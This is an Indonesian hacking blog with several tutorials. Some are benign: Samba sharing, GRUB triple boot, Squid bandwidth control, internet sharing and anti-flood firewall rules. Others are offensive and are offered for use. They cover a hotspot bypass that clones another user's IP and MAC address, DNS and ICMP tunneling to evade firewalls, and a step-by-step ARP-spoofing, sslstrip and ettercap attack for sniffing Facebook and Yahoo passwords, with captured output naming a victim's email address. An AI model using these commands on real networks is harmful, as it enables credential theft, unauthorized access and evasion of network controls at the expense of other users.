Rabu, 13 Oktober 2010

Sharing Folder Linux -> Windows dengan Samba

Samba adalah aplikasi file server yang digunakan oleh keluarga Unix untuk melakukan share folder,printer, dan lain2.
OK langsung aja :
Konfigurasi smb.conf
root@eXpL01t3r:~# nano /etc/samba/smb.conf

kemudian kita akan menentukan sebuah share folder. foldernya akan muncul di komputer client dengan nama shared, pindah ke baris paling akhir tambah argumen berikut
[shared]
comment = sharing
path = /var/ftp/pub
public = yes
writeable = yes
printable = no

tapi jangan lupa di bagian atas
workgroup = WORKGROUP

Argumen /var/ftp/pub muncul dokomputer client dengan nama shared. kemudian simpan hasil konfigurasi. dan sebaiknya uji hasilnya dengan menggunakan utilitas testparm
root@eXpL01t3r:~# testparm

kemudian uji di komputer client di windows XP, samakan workgroupnya
Klik kanan Mycomputer > Propeties > Computer Name > Change > isikan WORKGROUP

Setelah berhasil, masuk keexplorer lalu ketikkan pada address \\192.168.12 [ipkomputer yang di shared] , jika minta login isikan user dan passwordnya

Ok sekian dulu, silahkan dicoba. Maaf jika ada kesalahan. semoga berguna :o

Melewati Akses Mikrotik (Bypass Mikrotik) + SSH Tunneling

Cara ini memang sudah basi di network hacking, tapi gak apa2 niatnya kan cuman share. cz Ilmu itu milik Dunia :D hahahaha
ok langsung saja saya menggunakan LInux, windows juga bisa
1. Koneksikan Hotspot seperti biasa
root@eXpL01t3r:~#ifconfig wlan0 up
root@eXpL01t3r:~# iwconfig wlan0 essid "HOTSPOTKU"
root@eXpL01t3r:~#iwconfig wlan0 ap 00:11:22:33:44:55

2. cari client(komputer) yang terkoneksi dengan bantuan tuxcut atau wireshark, pilih salah satunya yang sedang terkoneksi. dan catat Ip dan Macadressnya

3. sekarang ganti ip dan macadress kamu dengan ip yang kamu catat tadi
Misalkan Ip dan Maccadres yang kamu catat :
ip : 192.168.30.13
macc :00:17:c4:bd:fe:09
gateway/mikrotik :192.168.30.1

root@eXpL01t3r:~#ifconfig wlan0 down
root@eXpL01t3r:~#macchanger -m 00:17:c4:bd:fe:09 wlan0
root@eXpL01t3r:~#ifconfig wlan0 up
root@eXpL01t3r:~#ifconfig wlan0 192.168.30.13
root@eXpL01t3r:~#route add default gw 192.168.30.1

4. setelah macc dan ip sudah terganti, koneksikan kembali seperti biasa --> ke no.1
Intinya disini cuman mengganti Ip dan Maccadres client yang telah melewati akses mikrotik

Cara ke 2
Untuk cara ke 2 dengan melakukan ssh tunneling, jadi seperti ini, biasanya user & password Mikrotik tiap komputer berbeda-beda, biasanya terjadi di jaringan kampus. anggaplah anda sebagai tamu di kampus, dan duduk di kantin dan ingin berinternet :p , jika anda meminta user dan pass mikrotik keteman anda, tetapi teman anda juga sedang memakai user dan password mikrotiknya. maka anda tidak dapat melewati akses mikrotiknya.
jadi biasanya saya melakukan cara ssh tunneling ke komputer teman saya
1. Suruh teman anda untuk membuka port 22 SSH nya
2. sekarang tunneling ke komputer teman
contoh : ip teman kamu : 192.168.30.7
root@eXpL01t3r:~#ssh -D 1080 user@192.168.30.7

nah minta password, isikan password teman kamu
3. sekarang tinggal setting di browser, masuk di pengaturan proxy di browser:
Preference > Network > Setting > Manual Proxy Configuration
isikan SOCKS Host : localhost
Port : 1080

4. Silahkan Berinternet ria
Intinya disini sharing internet via ssh tunneling

Maaf kalaw ada kesalahan diperbaiki cz lupa2 ingat hehehehehe. n klw ada yang kurang jelas silahkan komentnya
Thank's semoga berguna

Bypass Firewall dengan DNS Tunnel

Kemarin sempat saya bahas dengan teknik ICMP tunnel, ok sekarang prinsipnya hampir sama saja. DNS tunneling biasa dilakukan ketika sebuah firewal memblok semua protokol HTTP, HTPPS dan lain-lain. tetapi nslookup diizinkan.
DNS Tunneling merupakan program 2 sisi. harus dijalankan di Server dan Client
Ok langsung Ke tekniknya :
Konfigurasi Server
1. Download Programnya disini
2. Install dns2tcp
root@eXpL01t3r:~# cd /tmp
root@eXpL01t3r:~#tar xzvf dns2tcp-0.3.tar.gz
root@eXpL01t3r:~# cd dns2tcp-0.3
root@eXpL01t3r:~# configure
root@eXpL01t3r:~# make install

3. Setelah selesai menginstall akan menciptakan dns2tcpd dan dns2tcpc, kemudian edit /etc/dns2tcpd.conf
root@eXpL01t3r:~# nano /etc/dns2tcpd.conf
listen = w.x.y.z
port = 53
user=nobody
chroot = /var/empty/dns2tcp/
domain = dnstunnel.domainanda.net
ressources = ssh:127.0.0.1:22

4. Sekarang jalankan
root@eXpL01t3r:~#./dns2tcpd -F -d 1 -c dns2tcpd.conf


Konfigurasi Client
1. Installkan juga program diatas sama seperti server tadi
2. Edit /etc/dns2tcpc.conf
root@eXpL01t3r:~# nano /etc/dns2tcpd.conf
domain = dnstunnel.domainanda.net
ressource = ssh
local_port = 2222
debug_level=1

3.Kemudian Jalankan
root@eXpL01t3r:~#./dns2tcpc -z dnstunnel.domainanda.net
Available connection(s) :

4. Kemudian jalankan SSH session
root@eXpL01t3r:~#./dns2tcpd -c -f dns2tcpc.conf
listening on port 2222

root@eXpL01t3r:~#ssh -p 2222 user@127.0.0.1

Thank's Semoga Bermanfaat

Bypass Firewall dengan ICMP Tunnel + SSH Tunnel

Mungkin Teknik icmp tunneling sudah basi di dunia network hacking, tapi gak apa2 yang jelas share bagi yang belum tau.
Icmp tunneling biasa digunakan pada saat firewall memblok paket TCP seperti http & FTP dan lain2 tetapi paket icmp di izinkan ataw nge ping di izinkan.
ceritanya begini:
Pernah tidak anda terkoneksi ke sebuah jaringan, dan ketika anda melakukan browsing itu tidak bisa (server not found di browser anda) tetapi ketika anda melakukan ping kesalah satu website lancar sekali.
Dengan mengetahui bahwa ping diizinkan , langsung aja kita manfaatkan
saya memakai OS Backtrack dan aplikasi Ptunnel (aplikasi ICMP tunneling) dan open ssh
jika belum ada silahkan download cari di paman google
1. Rokok Sampoerna cukup 1 batang, kopi cappucino dan pacar disamping. hahahahahaha :p
2. Untuk menjalankan aplikasi ptunnel disisi client,saya tinggal mengetikkan perintah ini :
Dimana ip 178.18.17.67 adalah server dimana aplikasi server PingTunnel dijalankan.
root@eXpL01t3r:~# ptunnel -p 178.18.17.67 -lp 8000 -da 178.18.17.67 -dp 1080
[inf]: Starting ptunnel v 0.60.
[inf]: (c) 2004-2005 Daniel Stoedle, [EMAIL="daniels@cs.uit.no"]daniels@cs.uit.no[/EMAIL]
[inf]: Relaying packets from incoming TCP streams.
[inf]: Incoming connection.

3. Setelah itu saya lakukan koneksi ssh tunneling dengan perintah ini
root@eXpL01t3r:~# ssh -vvND 1080 -p 8000 -l surya localhost -C

4. kemudian saya settting Proxy di Firefox seperti ini
SOCKS Host : 127.0.0.1
Port : 1080

yang lain tidak usah, cukup socks hostnya saja
Ket : Anda harus memiliki account ssh di salah satu server jika ingin mencobanya.
Dan skarang anda bebas browsing dengan sepuasnya

Thank's semoga dapat berguna.

Triple Boot Linux dengan Grub

testing triple boot Backtrack, Fedora, Windows.
Edit /boot/grub/menu.lst
Settingan Grubnya seperti ini :
default=0
#timeout=10
splashimage=(hd0,4)/boot/grub/gunhole.xpm.gz
hiddenmenu
title FeD0r4 13
root (hd0,4)
kernel /boot/vmlinuz-2.6.33.3-85.fc13.i686.PAE ro root=UUID=7447a984-8431-4b24-83e3-2cfc183144f4 rd_NO_LUKS rd_NO_LVM rd_NO_MD rd_NO_DM LANG=en_US.UTF-8 SYSFONT=latarcyrheb-sun16 KEYTABLE=us rhgb quiet
initrd /boot/initramfs-2.6.33.3-85.fc13.i686.PAE.img

title B4cKtR4cK 4
kernel (hd0,8)/boot/vmlinuz-2.6.30.9 root=/dev/sda9 ro quiet splash
initrd (hd0,8)/boot/initrd.img-2.6.30.9


title W1nD0wS XP
rootnoverify (hd0,0)
chainloader +1

yang saya tambah yang di Bold
Ket : Untuk (hd0,8) sesuaikan letak Linuxnya, cek dengan perintah cfkdisk -l di konsole, jika /dev/sda9 berarti hd0,8. di kurang 1 saja.

Thank's Semoga berguna :D

Rabu, 04 Agustus 2010

Sniffing Jaringan dengan SSL (https,http) 100%

Mungkin kalian sudah tau tentang apa itu sniffing, sniffing atau dengan kata lainnya penyadapan paket yang lewat dalam jaringan. jadi ketika user & password yang lewat dalam jaringan bisa berbahaya..... wauuuuu ganas juga yah :p. berarti kita dapat menyadap (mencuri) user & password (facebook,yahoo,etc) dalam jaringan.
Saya menggunakan OS Backtrack 4 Final dan aplikasi Ettercap, SSLSTRIP, ARPSpoof,IPTABLES jika belum ada silahkan cari di google n download
Ok langsung aja ke Tekniknya :
1. Kopi Cappucino, Rokok Sampoerna, n Koneksi Jaringan dengan kecepatan 1 Gbp/s :p
2. Edit File /etc/etter.conf
root@bt:~# kwrite /etc/etter.conf

Cari bagian ini
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Kemudian Hilangkan tanda # seperti ini :
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

3. Aktifkan IP Forward
echo 1 > /proc/sys/net/ipv4/ip_forward

4. Redirect port 80 ke port 10000 (sslstrip)
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

5. Ok sekarang jalankan ArpSpoofing
Contoh
Target : 192.168.2.105
Gateway : 192.168.2.244

root@bt:~# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244

6. Kemudian Jalankan SSLSTRIP
root@bt:~# sslstrip -a -k -f

7. Ok langkah Terakhir Jalankan ettercap
root@bt:~# ettercap -T -q -i wlan0

Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
root@bt:~# ettercap -T -q -i wlan0

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)

wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0

Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.63.181.26:80 -> USER: [email]toovix07@yahoo.com[/email] PASS: (rahasia :p) INFO: [url]http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc&v=1.0&next=http://facebook.poker.zynga.com/poker/playa.php?uid=10000119039[/url]


Ok sekian dulu Tutornya, Silahkan dicicipi :p

Manajemen Bandwith dengan squid

1. Membatasi Bandwith menggunakan class
Contoh Kasus :
a. Komputer Server (192.168.0.1) mendapat jatah unlimited bandwith
b. Komputer milik administrator (192.168.0.2) juga mendapat jatah unlimited bandwith
c. Komputer Manajer dengan ip address (192.168.0.10 , 192.168.0.12, 192.168.0.14) mendapat bandwith 1,5 kbytes/sec jika ukuran dile yang diakses
melebihi 64 kbyte.
d. Komputer Staff dengan ip address (192.168.0.20 s/d 192.168.0.30) mendapat bandwith 1 kbytes/sec jika ukura file yang diakses melebihi 32 kbyte.

Berikut implementasinya :
Tentukan Konfigurasi file squid.conf sebagai berikut :
acl all src 0.0.0.0/0.0.0.0
acl server src 192.168.0.1/32
acl admin src 192.168.0.2/32
acl manajer src 192.168.0.10 192.168.0.12 192.168.0.14
acl staff src 192.168.0.20-192.168.0.30

delay_pools 3

#untuk pool no 1 dan class no 1
delay_class 1 1
delay_parameters 1 -1/-1
delay_acces 1 allow admin
delay_acces 1 allow server
delay_acces 1 deny all

#untuk pool no 2 dan class no 1
delay_class 2 1
delay_parameters 2 1500/64000
delay_acces 2 allow manajer
delay_acces 2 deny all

#untuk pool no 3 dan class no 1
delay_class 3 1
delay_parameters 3 1000/32000
delay_acces 3 allow staff
delay_acces 3 deny all

2. Membatasi Bandwith download file tertentu
Contoh Kasus :
Misalkan kita berlangganan akses internet dari isp dengan bandwith sebesar 512 Kb. Bandwith sebesar itu dibagi ke beberapa komputer pada network
192.168.1.0/24 dengan aturan :
a. Batas kecepatan koneksi untuk semua 256 kbps
b. Batas kecepatan koneksi per-network 64 kbps
c. Batas kecepatan per-user/host 2 kbps jika digunakan untuk download file exe, mp3, zip, rar, avi
d. Batas kecepatan per-ser/host akan mengikuti kecepatan per-network jika user tidak mendownload file2 diatas.

Berikut implementasinya , Edit kembali file squid.conf
#Tambah acl untuk networknya
acl lokal 192.168.1.0/24

#Tentukan acl untuk tipe-tipe file
acl filelimit url_regex -i \.exe
acl filelimit url_regex -i \.mp3
acl filelimit url_regex -i \.zip
acl filelimit url_regex -i \.avi

delay_pools 2

#pembatasan bandwith jika user mendownload file diatas
delay_class 1 3
delay_parameters 1 32000/32000 8000/8000 250/250
delay_acces 1 allow lokal filelimit
delay_acces 1 deny all

#Keaturan bandwith pernetwork
delay_class 2 2
delay_parameters 2 32000/32000 8000/8000
delay_acces 2 allow lokal
delay_acces 2 deny all

Thank's Semoga Bermanfaat

Kamis, 08 Juli 2010

Internet Sharing BACKTRACK

Mungkin sebagian teman2 sudah tau bagaimana melakukan internet sharing dengan Linux, jadi untuk yang belum tau aja :D, kali ini saya akan mencoba melakukan setting sebuah PC dengan OS Backtrack 4 dan client dengan OS windows XP dengan memakai VirtualBox dan Modem IM2
Ok langsung aja
1.Koneksikan modem terlebih dahulu,anggaplah sy mendapat konfigurasi modem sebagai berikut
IP :114.59.225.187
gateway :10.64.64.64
DNS :-202.155.0.15 -202.155.0.10

2. kemudian setting ip OS windows di Control Panel sebagai berikut
ip : 192.168.1.2
gateway : 192.168.1.1
Prefered DNS server : 202.155.0.15
Alternate DNS server : 202.155.0.10
(sesuaikan dengan DNS Modem anda)

3.Kemudian kembali di OS Linux,untuk memberi ip interface VirtualBOx ketikkan perintah
root@bt:~# ifconfig vboxnet0 192.168.1.1

4. Disini yang paling penting untuk Internet Sharingnya. saya akan setting rule untuk ipforward via interface vboxnet0, ketikkan perintah
root@bt:~# iptables -A FORWARD -i vboxnet0 -p ALL -s 192.168.1.2/24 -d 114.59.225.187 -j ACCEPT

kemudian set NAT (Network Addres Translation) dengan perintah
root@bt:~# iptables -t nat -A POSTROUTING -s 192.168.1.1/24 -j MASQUERADE

langkah terakhir aktifkan ip forward dengan perintah
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Nah sekarang kembali ke client Windows nya dan liat hasilnya :D
Thank's Semoga Bermanfaat

Sabtu, 19 Juni 2010

Mencegah serangan Syn & Ping Flood Attack (DOS)

Ok tudupoin aja :
1. Mencegah paket Syn Flood Attack
Buat sebuah file bernama closesyn.sh yang isinya sebagai berikut untuk mencegah serangan syn flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp --syn -j synjahat
iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP

kemudian jalankan di konsole/terminal
ExpL01t3r@bt:~# sh closesyn.sh

2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood
#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP

ExpL01t3r@bt:~# sh closeping.sh

coba lakukan testing dengan perintah
ExpL01t3r@bt:~#ping [target] -s 6500

Ok sekian dulu. Thank's Semoga Bermanfaat